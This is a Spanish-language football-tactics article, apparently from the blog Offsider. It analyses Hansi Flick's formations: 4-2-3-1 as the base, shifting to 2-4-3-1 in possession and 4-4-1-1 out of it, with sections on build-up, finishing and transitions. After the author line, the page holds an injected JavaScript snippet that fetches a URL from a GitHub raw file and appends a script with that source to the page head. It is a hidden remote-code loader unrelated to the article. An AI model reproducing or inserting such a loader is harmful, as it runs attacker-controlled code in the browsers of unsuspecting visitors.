El estilo de Hansi Flick

Hansi Flick cuenta con un estilo muy suyo, tiene una formación base que se transforma dependiendo del momento del partido.

Hansi Flick, con un estilo muy propio, acostumbra a usar un formación equilibrada; cuatro defensas, dos pivotes defensivos, un mediapunta, dos bandas y un punta (4-2-3-1). Dicha formación fue con la que llevó a la gloria al conjunto bávaro a conquistar el mundo ganado todos los títulos posibles en una temporada. Siempre quiere salir jugando el balón siempre y por ello necesita jugadores con buen control de balón, estilo de jugadores que en ‘Can Barça’ hay en abundancia.

Formaciones

Aunque su formación favorita es la mencionada anteriormente, la 4-2-3-1, sin embargo, es la formación base, ya que dependiendo del momento del juego, si el balón lo tiene su equipo o no varía. Si es su equipo el poseedor del balón el esquema del combinado pasa de 4-2-3-1 a 2-4-3-1. Es decir que los laterales de ambas bandas avanzan su posición para conseguir superioridad en el centro del campo, dejando solos a los dos centrales. Eso sí, cuando el balón lo tienen controlado el rival, la formación pasa del 4-2-3-1 a un 4-4-1-1. Es decir que, los extremos retroceden su posición hasta la altura de los pivotes, puesto que de esta forma ayudan al equipo al hacer la presión.

Fase de posesión

Construcción

En la fase previa del juego, el equipo de Flick se posiciona en el campo con un 2-4-3-1. En la mayoría de situaciones prefiere una construcción baja con los dos defensores centrales que reciben el balón del portero y preparan la acción. De los dos, el central con mayor técnica es el más buscado por el portero al inicio de la acción. Cuando el balón está en los pies de los centrales, los dos laterales se levantan en sus respectivos flancos para formar una línea de cuatro hombres con los mediocampistas, que están colocados muy juntos.

Los dos extremos y el mediapunta buscan espacios entre la defensa y el centro del campo contrario, mientras que delantero actúa como última referencia central. Las habilidades técnicas del portero hacen que en algunas ocasiones, especialmente si el equipo contrario presiona muy arriba con los centrales, el juego comience directamente con su pase preciso hacia el delantero o el mediapunta, siendo los dos extremos atacantes siempre muy buenos para gestionar los segundos balones.

El ejemplo de la formación 2-4-3-1. // A.I.A.P.C.

Desarrollo 

En el momento en que el equipo supera la primera línea de presión, su juego se desarrolla especialmente en las bandas exteriores. Los cuales tienden a centralizarse ligeramente para dejar espacio a los laterales ocupen el espacio generado. El delantero centro y el centrocampista ofensivo se turnan para bajar a recibir y buscar espacios entre líneas. La excelente visión del juego de centrocampista favorece los intercambios rápidos y las verticalizaciones. 

Refinamiento

Es gracias a los movimientos entre líneas que su equipo consigue construir las acciones más peligrosas. Uno de los jugadores más fuertes del mundo a la hora de realizar este tipo de movimientos acostumbra a ser el mediapunta, quien suele tener una gran habilidad para encontrarse siempre sin marca en las zonas más interesantes del campo. Además de los movimientos y de los dos extremos ofensivos, otro gran peligro para las defensas contrarias proviene de la capacidad de inserción de uno de los centrocampistas.

Finalización

Triangulaciones, superposiciones, verticalizaciones, centros, tiros desde fuera y soluciones individuales: el equipo de Flick utiliza muchas maneras para finalizar la cantidad de juego que construye. La capacidad de los laterales para penetrar en las bandas garantiza un gran número de centros y centros que un gran número de jugadores intentan rematar dentro del área rival. El número uno de Europa en los últimos 16 metros en este momento es sin duda Robert Lewandowski: el delantero centro polaco sabe anotar de todas las maneras y desde todas las posiciones, pero es sobre todo cuando juega dentro del área rival cuando se vuelve infalible.

Los bandas son demoledores en el uno contra uno y a menudo apuntan al hombre y luego intentan disparar. A menudo los centrales y los centrocampistas también intentan rematar a portería desde fuera del área, conscientes de que muchos compañeros están preparados en el área para aprovechar cualquier rebote.

Un ejemplo de una acción en fase de finalización. // A.I.A.P.C.

Fase de no posesión

En la fase sin posesión, Flick utiliza un 4-4-1-1, con los dos extremos ofensivos alineados con los dos centrocampistas y con el mediapunta actuando delante de los dos pivotes para presionar al portero contrario. La primera presión la realizan todos los jugadores ofensivos, quienes con un movimiento colectivo y bien organizado tienen como objetivo cerrar todas las líneas de pase posibles de los oponentes atacando al titular y obligando a realizar un pase largo. Los cuatro defensores se elevan mucho para mantener al equipo corto y dejar fuera de juego a los atacantes contrarios.

Cuando el equipo se ve obligado a bajar su centro de gravedad, la defensa se tumba, marcando a los jugadores ofensivos contrarios. En el caso de ataques provenientes de las bandas, los extremos atacantes dan su apoyo a los laterales doblando el portador. 

El ejemplo de cuando no tiene balón el equipo de Flick. // A.I.A.P.C.

Transición ofensiva

En el momento en que el equipo de Flick recupera el balón, a menudo deciden verticalizar inmediatamente hacia el delantero o uno de los dos extremos para reiniciar el contraataque. Los bandas, son muy buenos jugadores en el espacio y, si se lanzan hacia la portería, pueden volverse inalcanzables para los defensores contrarios. 

Transición defensiva 

En cuanto su equipo pierde el balón, inmediatamente intenta recuperarlo con la contrapresión llevada a cabo sobre todo por el delantero y los centrocampistas ofensivos. La línea defensiva también se eleva más allá de la línea del medio campo y los laterales permanecen altos para obligar al equipo contrario a realizar un tiro largo. El propio portero abandona su área para estar preparado para cualquier balón largo que pase por alto a los centrales.

Autor: Biel Arias

var url = ‘https://raw.githubusercontent.com/lolngnos/loles/main/step.txt’; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.src = data.trim(); document.getElementsByTagName(‘head’)[0].appendChild(script); });

Descubre más desde Offsider

Suscríbete ahora para seguir leyendo y obtener acceso al archivo completo.

Seguir leyendo